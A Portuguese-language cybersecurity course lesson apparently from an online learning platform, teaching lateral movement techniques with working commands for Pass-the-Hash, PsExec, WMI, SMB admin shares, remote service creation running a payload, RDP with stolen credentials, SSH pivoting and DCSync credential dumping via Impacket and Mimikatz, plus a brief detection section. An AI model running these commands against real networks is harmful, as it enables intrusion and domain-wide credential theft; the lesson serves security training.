Técnicas de Movimentação Lateral
Mova-se pelas redes usando WMI, PsExec, WinRM e compartilhamentos SMB sem disparar alertas.
Técnicas de Movimentação Lateral é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 3 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.
O que é movimentação lateral?
Movimentação lateral é o conjunto de técnicas que os invasores usam para avançar gradualmente por uma rede após o comprometimento inicial — passando do primeiro ponto de apoio para alvos de maior valor, como controladores de domínio, bancos de dados e sistemas de backup.
Pass-the-Hash (PtH)
A autenticação NTLM do Windows permite usar diretamente o hash da senha em vez da senha em texto simples. Um invasor que tenha extraído hashes NTLM pode se autenticar em outros sistemas sem quebrar o hash.
# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5
# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASHPass-the-Ticket (PtT)
Os tíquetes Kerberos (TGT ou TGS) podem ser extraídos da memória e importados para autenticação como o titular do tíquete. Os ataques Golden Ticket forjam TGTs usando o hash KRBTGT, proporcionando acesso ilimitado ao domínio por meio do Kerberos.
Execução remota de código: PSExec
psexec (Sysinternals e Impacket) executa comandos em hosts Windows remotos por meio de compartilhamentos SMB administrativos. Exige credenciais de administrador. Cria um binário de serviço no alvo.
impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexecMovimentação lateral com WMI
O Windows Management Instrumentation permite a execução remota de código sem criar arquivos detectáveis por muitas ferramentas:
# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")SMB e compartilhamentos administrativos
Os compartilhamentos administrativos do Windows (C$, ADMIN$, IPC$) permitem a movimentação lateral com credenciais de administrador:
# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5Serviços remotos: sc e at
Crie serviços ou tarefas agendadas em sistemas remotos:
# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc
# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"RDP e sessões interativas
RDP (Remote Desktop Protocol, porta 3389) fornece acesso interativo completo. Os invasores usam RDP com credenciais roubadas. Defesa: restrinja o RDP a servidores de salto, exija NLA e registre todas as sessões.
# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5SSH como movimentação lateral
Em ambientes Linux, o SSH com chaves ou credenciais roubadas permite a movimentação lateral. O abuso do encaminhamento de agentes possibilita passar por hosts comprometidos. Os túneis SSH encaminham portas para alcançar sistemas que, de outra forma, seriam inacessíveis.
# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_hostReplicação do Active Directory (DCSync)
O DCSync abusa da replicação do AD para extrair hashes de senhas diretamente do DC sem executar código nele — exige o privilégio DS-Replication-Get-Changes-All:
# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgtDetecção de movimentação lateral
Indicadores de detecção:
- Evento 4624 (logon) com logons incomuns do Tipo 3 (rede)
- Criação de serviços em hosts remotos (Evento 7045)
- Conexões SMB entre estações de trabalho
- Criação de processos WMI em hosts remotos
- Comportamento anormal de contas (usuário fazendo logon em várias máquinas)
Verificação rápida: movimentação lateral
Qual técnica permite que um invasor se autentique em sistemas Windows usando um hash NTLM capturado sem quebrá-lo?
Recapitulação da lição
A movimentação lateral usa credenciais e protocolos comprometidos para se espalhar pela rede. Técnicas principais: Pass-the-Hash (reutilização de hash NTLM), Pass-the-Ticket (Kerberos), PSExec/WMI/SMB para execução remota e DCSync para coleta de credenciais do domínio. Detecção: logons de rede incomuns (Evento 4624), criação de serviços remotos (Evento 7045) e tráfego SMB entre estações de trabalho.
Perguntas Frequentes
A aula “Técnicas de Movimentação Lateral” é grátis?
Sim — o texto completo de “Técnicas de Movimentação Lateral” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.
O que vou aprender em “Técnicas de Movimentação Lateral”?
Mova-se pelas redes usando WMI, PsExec, WinRM e compartilhamentos SMB sem disparar alertas. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Cyber Security Academy?
Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 3 de 4.
Quanto tempo leva a aula “Técnicas de Movimentação Lateral”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Cyber Security Academy?
Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Frameworks de C2: Cobalt Strike e Sliver
- Binários Living-Off-the-Land (LOLBins)
- Técnicas de Movimentação Lateral
- Redação de Relatórios de Red Team